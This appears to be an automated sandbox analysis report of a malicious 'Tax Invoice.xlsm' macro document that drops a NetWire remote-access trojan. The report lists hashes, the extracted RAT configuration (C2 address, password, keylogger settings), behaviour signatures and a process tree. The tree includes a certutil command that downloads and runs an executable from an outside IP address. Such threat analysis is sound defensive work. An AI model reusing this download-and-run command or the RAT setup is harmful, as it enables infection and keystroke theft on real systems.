Analysis
- max time kernel: 135s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17-11-2022 04:52
- Static task: static1
- Behavioral task: behavioral1
- Sample: Tax Invoice.xlsm
- Resource: win7-20221111-en
General
- Target: Tax Invoice.xlsm
- Size: 42KB
- MD5: 1a5f56600a34c20305f85f2cd0fdfbdf
- SHA1: d37b42fd8d23e2fbdaebb55012fd028525e4e72c
- SHA256: c0ca12020d7bf51209e7ac026fdfd71f55b97053985b061de24879069c96910c
- SHA512: 630cf26791900e941843a5e94308031c1e3dab8f60836e395e06f2c0a5fd11bf2beac5115429068276ff9fe1ffdb07d3a49b24029911da8016d490aadcc331d8
- SSDEEP: 768:IvjsCvCssn3uBIJYfTH+niSpKvDH7Nv+nWhFFiKk/f7qtNhTxRB+nE2g7d:IvDvCT3uG1ByT7Nv+qFFi3/jqLxxyE2g
Malware Config
Extracted: netwire
- 212.193.30.230:3345
- activex_autorun: false
- copy_executable: false
- delete_original: false
- host_id: HostId-%Rand%
- keylogger_dir: %AppData%\Logs\
- lock_executable: false
- offline_keylogger: true
- password: Password@9
- registry_autorun: false
- use_mutex: false
Signatures
- NetWire RAT payload (4 IoCs)
  Processes (resource: yara_rule):
  - behavioral2/memory/1940-160-0x0000000000400000-0x0000000000433000-memory.dmp: netwire
  - behavioral2/memory/1940-163-0x0000000000400000-0x0000000000433000-memory.dmp: netwire
  - behavioral2/memory/1940-164-0x0000000000400000-0x0000000000433000-memory.dmp: netwire
  - behavioral2/memory/1940-165-0x0000000000400000-0x0000000000433000-memory.dmp: netwire
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description; pid, pid_target, process, target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid 4308, pid_target 2636, process cmd.exe, target process EXCEL.EXE
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes (pid, process):
  - 5084 Niipxzvceptnltqinb.exe.exe
  - 1940 Niipxzvceptnltqinb.exe.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes (description: ioc (process)):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation (Niipxzvceptnltqinb.exe.exe)
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description; pid, process, target process):
  - PID 5084 set thread context of 1940; pid 5084, process Niipxzvceptnltqinb.exe.exe, target process Niipxzvceptnltqinb.exe.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description: ioc (process)):
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description: ioc (process)):
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid, process):
  - 2636 EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
  - 1444 powershell.exe (2 identical entries)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description; pid, process):
  - Token: SeDebugPrivilege; pid 5084, Niipxzvceptnltqinb.exe.exe
  - Token: SeDebugPrivilege; pid 1444, powershell.exe
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes (pid, process):
  - 2636 EXCEL.EXE (14 identical entries)
- Suspicious use of WriteProcessMemory (27 IoCs)
  Processes (description; process -> target process; identical entries collapsed with counts):
  - PID 2636 wrote to memory of 4308; EXCEL.EXE -> cmd.exe (2 entries)
  - PID 4308 wrote to memory of 2108; cmd.exe -> certutil.exe (2 entries)
  - PID 4308 wrote to memory of 5084; cmd.exe -> Niipxzvceptnltqinb.exe.exe (3 entries)
  - PID 5084 wrote to memory of 4496; Niipxzvceptnltqinb.exe.exe -> cmd.exe (3 entries)
  - PID 4496 wrote to memory of 1540; cmd.exe -> PING.EXE (3 entries)
  - PID 5084 wrote to memory of 1444; Niipxzvceptnltqinb.exe.exe -> powershell.exe (3 entries)
  - PID 5084 wrote to memory of 1940; Niipxzvceptnltqinb.exe.exe -> Niipxzvceptnltqinb.exe.exe (11 entries)
Processes
- Process (depth 1): C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Invoice.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Process (depth 2): C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe && Niipxzvceptnltqinb.exe.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - Process (depth 3): C:\Windows\system32\certutil.exe
      Command line: certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe
    - Process (depth 3): C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Command line: Niipxzvceptnltqinb.exe.exe
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - Process (depth 4): C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c ping google.com
        - Suspicious use of WriteProcessMemory
        - Process (depth 5): C:\Windows\SysWOW64\PING.EXE
          Command line: ping google.com
          - Runs ping.exe
      - Process (depth 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
        (the -enc argument, base64-decoded as UTF-16LE, is: Start-Sleep -Seconds 10)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - Process (depth 4): C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
        Command line: C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
  Filesize: 7KB
  MD5: 828988c5e283c07b481aae790b9f1664
  SHA1: 68240ab5ec927d8ee2af027110faee0f2531c828
  SHA256: 44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133
  SHA512: 1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d
Memory dumps (dump: filesize; mapping dumps have no size):
- memory/1444-157-0x0000000007DB0000-0x000000000842A000-memory.dmp: 6.5MB
- memory/1444-154-0x0000000005E90000-0x0000000005EF6000-memory.dmp: 408KB
- memory/1444-151-0x0000000000000000-mapping.dmp
- memory/1444-152-0x0000000004F90000-0x0000000004FC6000-memory.dmp: 216KB
- memory/1444-158-0x0000000006A50000-0x0000000006A6A000-memory.dmp: 104KB
- memory/1444-153-0x00000000056F0000-0x0000000005D18000-memory.dmp: 6.2MB
- memory/1444-156-0x0000000006560000-0x000000000657E000-memory.dmp: 120KB
- memory/1444-155-0x0000000005F00000-0x0000000005F66000-memory.dmp: 408KB
- memory/1540-149-0x0000000000000000-mapping.dmp
- memory/1940-165-0x0000000000400000-0x0000000000433000-memory.dmp: 204KB
- memory/1940-164-0x0000000000400000-0x0000000000433000-memory.dmp: 204KB
- memory/1940-163-0x0000000000400000-0x0000000000433000-memory.dmp: 204KB
- memory/1940-159-0x0000000000000000-mapping.dmp
- memory/1940-160-0x0000000000400000-0x0000000000433000-memory.dmp: 204KB
- memory/2108-140-0x0000000000000000-mapping.dmp
- memory/2636-138-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmp: 64KB
- memory/2636-133-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp: 64KB
- memory/2636-134-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp: 64KB
- memory/2636-135-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp: 64KB
- memory/2636-136-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp: 64KB
- memory/2636-137-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmp: 64KB
- memory/2636-132-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp: 64KB
- memory/4308-139-0x0000000000000000-mapping.dmp
- memory/4496-148-0x0000000000000000-mapping.dmp
- memory/5084-146-0x00000000057C0000-0x0000000005852000-memory.dmp: 584KB
- memory/5084-141-0x0000000000000000-mapping.dmp
- memory/5084-144-0x0000000000D90000-0x0000000000D98000-memory.dmp: 32KB
- memory/5084-145-0x0000000005D70000-0x0000000006314000-memory.dmp: 5.6MB
- memory/5084-150-0x0000000008970000-0x0000000008992000-memory.dmp: 136KB
- memory/5084-147-0x00000000068F0000-0x00000000068FA000-memory.dmp: 40KB